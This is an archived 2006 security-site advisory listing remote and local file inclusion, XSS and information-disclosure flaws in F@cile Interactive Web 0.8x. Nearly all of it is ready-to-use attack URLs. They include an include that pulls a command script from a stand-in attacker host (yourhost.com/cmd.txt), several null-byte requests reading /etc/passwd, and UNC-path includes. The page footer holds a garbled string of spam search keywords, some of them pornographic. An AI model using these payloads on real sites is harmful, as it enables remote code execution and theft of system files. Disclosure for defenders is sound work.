about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities



2006-05-29 F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities
Rated as : HIgh Risk

F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on F@cile Interactive Web <= 0.8x 
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
File Inclusion Vulnerabilities.
http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php
<- php5
http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php
<- php5
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
Cross Site Scripting.
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
Information disclosure
http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
securitydot.net - 2006-05-29

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 16:37:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
GAI HOT .C www.Sexyph sendmail e www.9956.c binc GAI HOT .C p&amp; pic sexey www.3158ip WWW.ZTOD.C w...hp?155 indiiansex Www.punyu www.dldvb. w...hp?155 w...hp?155 w...hp?155 Www.punyu news+for+c php-nuke+2 WWW.SEXSY. maxcpm.inf SEXIWALLPA WW.REALSEX 3pic .com maxcpm.inf Crack Data zus Jepangsex dada di-614 fi www.imlive Jepangsex Crack+Data fuckingvid globalvava girl14.com dmoz.im maxcpm.inf viewer ip news for c RedHat Ent news for c gentai Yet Anothe clips xxx moveis com_phpsho VWware sexstars